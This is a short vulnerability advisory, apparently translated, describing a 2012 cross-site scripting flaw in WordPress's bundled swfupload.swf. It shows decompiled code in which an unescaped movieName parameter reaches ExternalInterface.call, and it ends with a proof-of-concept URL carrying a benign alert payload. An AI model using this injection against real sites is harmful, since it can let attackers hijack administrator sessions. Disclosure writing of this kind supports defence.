WordPress XSS vulnerability (swfupload.swf)

Vulnerability status

2012-05-18: Details reported to the vendor, awaiting vendor handling
2012-05-18: Vendor confirmed the vulnerability; details disclosed to the vendor only


Summary

WordPress is a blogging platform written in PHP; users can host their own blog on any server that supports PHP and a MySQL database, and WordPress is also widely used as a general content management system (CMS). Recently a foreign security researcher found a serious cross-site scripting (XSS) flaw in the file-upload component bundled with WordPress. An attacker who tricks a logged-in administrator into opening a crafted URL gets script execution in the site's own origin, and from there can act as the administrator and obtain a webshell (GETSHELL).

Details

Original write-up: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/

The vulnerable file is wp-includes/js/swfupload/swfupload.swf. In its source, the arguments passed to ExternalInterface.call (the second and later parameters) are safely encoded, but the first parameter, the name of the JavaScript function to invoke, is not encoded at all. That name is built by string concatenation from movieName, a parameter read from the FlashVars / query string and therefore under the attacker's control, so anything placed in movieName ends up spliced into the JavaScript that Flash Player evaluates in the page. The result is XSS.
 
// Decompiled from wp-includes/js/swfupload/swfupload.swf (SWFUpload class).
// movieName is read straight from the SWF's FlashVars / query string, so it is attacker-controlled.
this.movieName = root.loaderInfo.parameters.movieName;
...
// The tainted value is concatenated into a JavaScript expression with no escaping of quotes or brackets.
this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
...
if (ExternalCall.Bool(this.testExternalInterface_Callback)){
    // The tainted string becomes the function-name (first) argument of ExternalInterface.call.
    ExternalCall.Simple(this.flashReady_Callback);
    this.hasCalledFlashReady = true;
}

=================
class ExternalCall extends Object{
...
        // Only the call arguments are encoded by the Flash Player; the function name is passed verbatim.
        public static function Simple(param1:String) : void
        {
            ExternalInterface.call(param1);
            return;
        }

Proof of concept

http://www.80sec.com/wp-includes/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//
